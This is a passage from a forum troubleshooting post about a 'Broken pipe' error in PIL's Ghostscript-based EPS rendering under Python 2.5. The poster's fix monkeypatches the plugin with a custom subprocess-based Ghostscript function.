    tr_modelllo = render_row_picking_list(pard, item, picked=0, plist_allowed=plist_allowed)
  File "/home/dtwebsite/bin/cms_gest_picking_list.py", line 432, in render_row_picking_list
    aa = a.tostring()
  File "/rnd/apps/interpreters/python-2.5.6/lib/python2.5/site-packages/PIL/Image.py", line 532, in tostring
    self.load()
  File "/rnd/apps/interpreters/python-2.5.6/lib/python2.5/site-packages/PIL/EpsImagePlugin.py", line 283, in load
    self.im = Ghostscript(self.tile, self.size, self.fp)
  File "/home/dtwebsite/bin/cms_gest_picking_list.py", line 64, in mioGhostscript
    gs.stdin.write(s)
IOError: [Errno 32] Broken pipe
Can someone help me, please?
I found the solution to the problem.
It was the PIL package: something didn't compile right during the installation.
After that I had a dependency problem, which I fixed in the following way:
import PIL.EpsImagePlugin
PIL.EpsImagePlugin.Ghostscript = mioGhostscript
Then I saw this in the command:
"- >/dev/null 2>/dev/null"
That is shell syntax, and it didn't work on my system because Python tried to read a file literally named - >/dev/null 2>/dev/null, which doesn't exist.
I replaced
"- >/dev/null 2>/dev/null"
with
"-"
and the program now reads from stdin.
The final code is:
def mioGhostscript(tile, size, fp):
    """Render an image using Ghostscript (Unix only)"""
    # Unpack decoder tile
    decoder, tile, offset, data = tile[0]
    length, bbox = data
    import tempfile, os
    file = tempfile.mktemp()
    # Build ghostscript command
    command = ["gs",
               "-q",                      # quiet mode
               "-g%dx%d" % size,          # set output geometry (pixels)
               "-dNOPAUSE -dSAFER",       # don't pause between pages, safe mode
               "-sDEVICE=ppmraw",         # ppm driver
               "-sOutputFile=%s" % file,  # output file
               "-"
               ]
    #command = shlex.split(string.join(command))
    # push data through ghostscript
    try:
        #gs = os.popen(command, "w")
        args = command  #['gs','-dSAFER','-dNOPAUSE','-dBATCH','-sDEVICE=jpeg','-sOutputFile=/home/user/output2.jpg /home/user/downloads/test.pdf']
        gs = subprocess.Popen(args, stdout=PIPE, stderr=STDOUT, stdin=PIPE)
        # adjust for image origin
        if bbox[0] != 0 or bbox[1] != 0:
            #gs.write("%d %d translate\n" % (-bbox[0], -bbox[1]))
            gs.stdin.write("%d %d translate\n" % (-bbox[0], -bbox[1]))
        fp.seek(offset)
        while length > 0:
            s = fp.read(8192)
            if not s:
                break
            length = length - len(s)
            gs.stdin.write(s)
        gs.communicate()[0]
        status = gs.stdin.close()
        #status = gs.close()
        #if status:
        #    raise IOError("gs failed (status %d)" % status)
        im = Image.core.open_ppm(file)
    finally:
        try: os.unlink(file)
        except: pass
    return im

import PIL.EpsImagePlugin
PIL.EpsImagePlugin.Ghostscript = mioGhostscript
I hope this post can help someone.
